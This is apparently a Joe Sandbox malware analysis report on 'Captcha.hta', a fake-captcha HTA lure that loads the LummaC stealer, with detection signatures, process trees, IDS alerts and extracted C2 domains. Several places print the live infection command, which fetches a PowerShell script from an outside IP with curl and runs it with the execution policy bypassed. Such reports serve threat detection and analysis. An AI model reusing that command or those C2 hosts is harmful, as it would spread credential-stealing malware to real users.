Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Captcha.hta

Overview

General Information

Sample name:Captcha.hta
Analysis ID:1573886
MD5:a7045bcb116c3d85f1ff3706bec2b920
SHA1:4ff06af316d7e0453c948d358065d71301ea204a
SHA256:8abf12e3a919213c8ff825c1cc1df070990156d829bd5c55d6ce2f6974d77272
Infos:

Detection

LummaC, Cobalt Strike, HTMLPhisher, LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected Cobalt Strike Beacon
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected HtmlPhish44
Yara detected LummaC Stealer
Yara detected obfuscated html page
.NET source code contains very large strings
.NET source code references suspicious native API functions
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Compiles code for process injection (via .Net compiler)
LummaC encrypted strings found
Machine Learning detection for dropped file
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Suspicious MSHTA Child Process
Suspicious command line found
Suspicious execution chain found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64native
  • mshta.exe (PID: 2492 cmdline: mshta.exe "C:\Users\user\Desktop\Captcha.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 568 cmdline: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command - MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • curl.exe (PID: 1844 cmdline: curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 MD5: 4329254E74AD91D047E3CEDCC7C138C3)
      • powershell.exe (PID: 5040 cmdline: powershell -NoProfile -ExecutionPolicy Bypass -Command - MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • csc.exe (PID: 4768 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 3308 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEA2B.tmp" "c:\Users\user\AppData\Local\Temp\cqvy0dal\CSC988509BDD3DA4C1893528181DB7478.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • RegAsm.exe (PID: 1848 cmdline: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["awake-weaves.cyou", "deafeninggeh.biz", "debonairnukk.xyz", "wrathful-jammy.cyou", "sordid-snaked.cyou", "immureprech.biz", "diffuculttan.xyz", "effecterectz.xyz"], "Build id": "DUkgLv--EBALAY"}
SourceRuleDescriptionAuthorStrings
Captcha.htaJoeSecurity_ObshtmlYara detected obfuscated html pageJoe Security
    Captcha.htaJoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
      SourceRuleDescriptionAuthorStrings
      sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
          SourceRuleDescriptionAuthorStrings
          00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
            00000004.00000002.4103780633.00000000058D4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
              Process Memory Space: powershell.exe PID: 5040JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                Process Memory Space: powershell.exe PID: 5040INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                • 0x40ac2d:$b2: ::FromBase64String(
                • 0x40ac69:$b2: ::FromBase64String(
                • 0x40d65b:$b2: ::FromBase64String(
                • 0x40d69b:$b2: ::FromBase64String(
                • 0x29a2b7:$s1: -join
                • 0x29aa2d:$s1: -join
                • 0x2f3369:$s1: -join
                • 0x30043e:$s1: -join
                • 0x303810:$s1: -join
                • 0x303ec2:$s1: -join
                • 0x3059b3:$s1: -join
                • 0x307bb9:$s1: -join
                • 0x3083e0:$s1: -join
                • 0x308c50:$s1: -join
                • 0x30938b:$s1: -join
                • 0x3093bd:$s1: -join
                • 0x309405:$s1: -join
                • 0x309424:$s1: -join
                • 0x309c74:$s1: -join
                • 0x309df0:$s1: -join
                • 0x309e68:$s1: -join
                decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
                  SourceRuleDescriptionAuthorStrings
                  7.2.RegAsm.exe.400000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                    7.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security

                      System Summary

                      barindex
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -, CommandLine: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\Captcha.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 2492, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -, ProcessId: 568, ProcessName: cmd.exe
                      Source: Process startedAuthor: frack113: Data: Command: powershell -NoProfile -ExecutionPolicy Bypass -Command -, CommandLine: powershell -NoProfile -ExecutionPolicy Bypass -Command -, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 568, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -NoProfile -ExecutionPolicy Bypass -Command -, ProcessId: 5040, ProcessName: powershell.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: powershell -NoProfile -ExecutionPolicy Bypass -Command -, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5040, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.cmdline", ProcessId: 4768, ProcessName: csc.exe
                      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -, CommandLine: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\Captcha.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 2492, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -, ProcessId: 568, ProcessName: cmd.exe
                      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5040, TargetFilename: C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.cmdline
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -NoProfile -ExecutionPolicy Bypass -Command -, CommandLine: powershell -NoProfile -ExecutionPolicy Bypass -Command -, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 568, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -NoProfile -ExecutionPolicy Bypass -Command -, ProcessId: 5040, ProcessName: powershell.exe

                      Data Obfuscation

                      barindex
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: powershell -NoProfile -ExecutionPolicy Bypass -Command -, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5040, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.cmdline", ProcessId: 4768, ProcessName: csc.exe
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-12T17:33:59.162444+010020283713Unknown Traffic192.168.11.2049711172.67.207.38443TCP
                      2024-12-12T17:34:00.352278+010020283713Unknown Traffic192.168.11.2049712172.67.207.38443TCP
                      2024-12-12T17:34:01.198117+010020283713Unknown Traffic192.168.11.2049713172.67.207.38443TCP
                      2024-12-12T17:34:02.050943+010020283713Unknown Traffic192.168.11.2049714172.67.207.38443TCP
                      2024-12-12T17:34:03.244896+010020283713Unknown Traffic192.168.11.2049715172.67.207.38443TCP
                      2024-12-12T17:34:04.255802+010020283713Unknown Traffic192.168.11.2049716172.67.207.38443TCP
                      2024-12-12T17:34:05.548951+010020283713Unknown Traffic192.168.11.2049717172.67.207.38443TCP
                      2024-12-12T17:34:08.579973+010020283713Unknown Traffic192.168.11.2049718172.67.207.38443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-12T17:34:00.033272+010020546531A Network Trojan was detected192.168.11.2049711172.67.207.38443TCP
                      2024-12-12T17:34:00.936925+010020546531A Network Trojan was detected192.168.11.2049712172.67.207.38443TCP
                      2024-12-12T17:34:09.472822+010020546531A Network Trojan was detected192.168.11.2049718172.67.207.38443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-12T17:34:00.033272+010020498361A Network Trojan was detected192.168.11.2049711172.67.207.38443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-12T17:34:00.936925+010020498121A Network Trojan was detected192.168.11.2049712172.67.207.38443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-12T17:33:57.549674+010020197142Potentially Bad Traffic192.168.11.2049710147.45.44.13180TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-12T17:34:02.947656+010020480941Malware Command and Control Activity Detected192.168.11.2049714172.67.207.38443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-12T17:33:57.550523+010028000291Attempted User Privilege Gain147.45.44.13180192.168.11.2049710TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: awake-weaves.cyouAvira URL Cloud: Label: malware
                      Source: sordid-snaked.cyouAvira URL Cloud: Label: malware
                      Source: https://immureprech.biz/apiAvira URL Cloud: Label: malware
                      Source: wrathful-jammy.cyouAvira URL Cloud: Label: malware
                      Source: C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.dllAvira: detection malicious, Label: HEUR/AGEN.1300034
                      Source: 7.2.RegAsm.exe.400000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["awake-weaves.cyou", "deafeninggeh.biz", "debonairnukk.xyz", "wrathful-jammy.cyou", "sordid-snaked.cyou", "immureprech.biz", "diffuculttan.xyz", "effecterectz.xyz"], "Build id": "DUkgLv--EBALAY"}
                      Source: Captcha.htaReversingLabs: Detection: 13%
                      Source: C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.dllJoe Sandbox ML: detected
                      Source: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: sordid-snaked.cyou
                      Source: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: awake-weaves.cyou
                      Source: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: wrathful-jammy.cyou
                      Source: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: debonairnukk.xyz
                      Source: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: diffuculttan.xyz
                      Source: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: effecterectz.xyz
                      Source: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: deafeninggeh.biz
                      Source: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: immureprech.biz
                      Source: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: immureprech.biz
                      Source: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                      Source: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                      Source: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                      Source: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                      Source: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                      Source: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: DUkgLv--EBALAY
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00415298 CryptUnprotectData,7_2_00415298
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00415F66 CryptUnprotectData,CryptUnprotectData,7_2_00415F66

                      Phishing

                      barindex
                      Source: Yara matchFile source: Captcha.hta, type: SAMPLE
                      Source: Yara matchFile source: Captcha.hta, type: SAMPLE
                      Source: unknownHTTPS traffic detected: 172.67.207.38:443 -> 192.168.11.20:49711 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.207.38:443 -> 192.168.11.20:49712 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.207.38:443 -> 192.168.11.20:49713 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.207.38:443 -> 192.168.11.20:49714 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.207.38:443 -> 192.168.11.20:49715 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.207.38:443 -> 192.168.11.20:49716 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.207.38:443 -> 192.168.11.20:49717 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.207.38:443 -> 192.168.11.20:49718 version: TLS 1.2
                      Source: Binary string: System.Windows.Forms.pdb source: powershell.exe, 00000004.00000002.4110820466.0000000070FEB000.00000020.00000001.01000000.0000000C.sdmp
                      Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: powershell.exe, 00000004.00000002.4110820466.0000000070FEB000.00000020.00000001.01000000.0000000C.sdmp
                      Source: Binary string: System.Drawing.pdb source: powershell.exe, 00000004.00000002.4121706170.00000000711CB000.00000020.00000001.01000000.0000000B.sdmp
                      Source: Binary string: System.Windows.Forms.ni.pdb source: powershell.exe, 00000004.00000002.4110820466.0000000070FEB000.00000020.00000001.01000000.0000000C.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.pdb source: powershell.exe, 00000004.00000002.4107992921.000000000812B000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Drawing.ni.pdb source: powershell.exe, 00000004.00000002.4121706170.00000000711CB000.00000020.00000001.01000000.0000000B.sdmp
                      Source: Binary string: q8C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.pdb source: powershell.exe, 00000004.00000002.4100255079.0000000004E0E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Drawing.ni.pdbRSDS source: powershell.exe, 00000004.00000002.4121706170.00000000711CB000.00000020.00000001.01000000.0000000B.sdmp

                      Software Vulnerabilities

                      barindex
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+38h]7_2_0040C917
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h7_2_00425990
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, di7_2_00425990
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [edi+eax]7_2_00415298
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], dx7_2_00415298
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CAA82E26h7_2_0043CB20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, eax7_2_0042C45C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]7_2_0042B4FC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, eax7_2_0042B4FC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], E88DDEA1h7_2_0043CD60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edi, byte ptr [edx+ecx]7_2_0040DD25
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000A8h]7_2_00415F66
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], A896961Ch7_2_00419770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 6E83E51Eh7_2_00419770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 6E83E51Eh7_2_00419770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 67F3D776h7_2_00419770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h7_2_00419770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B7C1BB11h7_2_00419770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 6E83E51Eh7_2_00419770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h7_2_00419770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al7_2_0040CFF3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx eax, byte ptr [eax+ecx-6A653384h]7_2_0040CFF3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp al, 2Eh7_2_00426054
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax7_2_00426054
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h7_2_0043B05D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]7_2_0043B05D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h7_2_0043B068
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]7_2_0043B068
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [eax+ecx-3F9DFECCh]7_2_0040E83B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h7_2_0043B05B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]7_2_0043B05B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, eax7_2_0040A940
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, ecx7_2_0040A940
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx7_2_0043C1F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]7_2_0043B195
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movsx eax, byte ptr [esi]7_2_0043B9A1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], A269EEEFh7_2_004369A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edx]7_2_0041E9B0
